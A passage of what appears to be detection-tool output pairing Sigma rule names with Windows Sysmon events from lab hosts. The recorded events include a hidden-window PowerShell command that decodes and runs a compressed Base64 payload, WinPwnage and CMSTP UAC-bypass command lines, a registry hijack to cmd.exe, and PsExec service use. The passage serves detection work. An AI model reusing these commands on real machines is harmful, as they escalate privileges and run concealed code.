20:26:51.965"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9808,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.106089Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","FromBase64String Command Line","Encoded FromBase64String"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"powershell.exe\" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 
20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution":{"#attributes":{"ProcessID":1964,"ThreadID":1664}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"}},"Version":2}}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 
11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution":{"#attributes":{"ProcessID":2580,"ThreadID":4144}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"}},"Version":2}}}},{"detection":["PsExec Service Start"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 
11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution":{"#attributes":{"ProcessID":2580,"ThreadID":4144}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution":{"#attributes":{"ProcessID":112,"ThreadID":2084}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution":{"#attributes":{"ProcessID":2016,"ThreadID":2012}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 
12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution":{"#attributes":{"ProcessID":2016,"ThreadID":2012}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" 
","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT 
AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3432}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"}},"Version":2}}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"}},"Version":5}}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App 
Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution":{"#attributes":{"ProcessID":2752,"ThreadID":3576}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"}},"Version":5}}}},{"detection":["Renamed Binary"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 
22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3572}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® 
Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft 